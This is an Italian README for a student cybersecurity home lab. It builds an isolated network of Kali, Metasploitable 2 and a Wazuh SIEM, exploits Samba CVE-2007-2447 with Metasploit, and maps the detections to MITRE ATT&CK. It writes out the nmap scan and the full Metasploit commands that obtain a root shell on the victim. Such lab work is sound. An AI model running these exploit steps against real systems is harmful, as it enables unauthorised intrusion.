
Laboratorio di attacco AD/Linux isolato: sfruttata CVE-2007-2447 tramite Metasploit, rilevata con Wazuh SIEM mappata su MITRE ATT&CK (T1190, T1059)
Progetto B.Tech (BTP) | IIIT Pune Basato su: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi
Un laboratorio domestico di cybersicurezza completamente funzionante, costruito su una singola macchina utilizzando strumenti gratuiti e open-source. Il laboratorio simula un ciclo di vita di attacco reale — Ricognizione → Exploitation → Rilevamento — e dimostra come un SIEM possa rilevare e mappare gli attacchi al framework MITRE ATT&CK in tempo reale.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
Crea una rete interna denominata cyberlab in VirtualBox. Tutte e tre le VM ricevono questo adattatore. La VM Ubuntu/Wazuh riceve un adattatore Host-Only aggiuntivo così puoi accedere alla dashboard dal tuo browser.
cyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Non esporre mai Metasploitable 2 a internet. È intenzionalmente insicuro.
cyberlab interno + Host-Only/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (dal browser dell'host)Poiché Metasploitable 2 non può eseguire un agente Wazuh, configura l'inoltro syslog per il monitoraggio senza agente:
Su Metasploitable, aggiungi a /etc/rsyslog.conf:
*.* @10.0.0.3:514
Su Wazuh (Ubuntu), abilita l'input syslog in /var/ossec/etc/ossec.conf:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Riavvia Wazuh: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Principali servizi individuati su Metasploitable 2:
Sono state individuate oltre 20 porte aperte. OS identificato tramite fingerprinting: Linux 2.6.x
Vulnerabilità: CVE-2007-2447 — Command Injection Samba usermap_script
Consente l'esecuzione remota di codice non autenticata tramite richieste MS-RPC malformate su Samba 3.0.0–3.0.25rc3.
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
Dopo l'exploit, Wazuh ha rilevato e mappato automaticamente gli eventi su MITRE ATT&CK:
Eventi totali rilevati: 55+
Accedi alla dashboard all'indirizzo https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
Questo laboratorio è costruito interamente su macchine virtuali isolate, senza accesso a internet durante le simulazioni di attacco. Tutti gli strumenti e le tecniche vengono utilizzati esclusivamente a scopo educativo in un ambiente controllato. Non tentare di replicare alcuna tecnica di attacco su sistemi che non possiedi o per i quali non hai ricevuto esplicita autorizzazione al test.
Presentato da Harshita Verma | IIIT Pune
| VM | Ruolo | IP | Strumenti |
|---|
| Kali Linux 2026.1 | Attaccante | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | Vittima | 10.0.0.2 | 20+ vulnerabilità |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| Strumento | Versione | Scopo |
|---|
| VirtualBox | 7.x | Hypervisor — esegue tutte le VM su un unico host |
| Kali Linux | 2026.1 | Sistema operativo per test di penetrazione (offensivo) |
| Metasploitable 2 | v2.0 | Target intenzionalmente vulnerabile |
| Wazuh | v4.7.5 | SIEM open-source (difensivo) |
| Nmap | Ultima | Scansione di rete/porte |
| Metasploit Framework | Ultima | Framework di exploitation |
| Porta | Servizio | Versione |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| ID Regola | Descrizione | Tecnica MITRE | Tattica |
|---|
| 5402 | Esecuzione riuscita di sudo verso ROOT | T1548.003 | Escalation dei privilegi |
| 5501 | PAM: sessione di login aperta | T1078 | Accesso iniziale / Persistenza |
| 5502 | PAM: sessione di login chiusa | T1078 | Evasione della difesa |
| 502 | Server Wazuh avviato | — | Rilevamento attivo |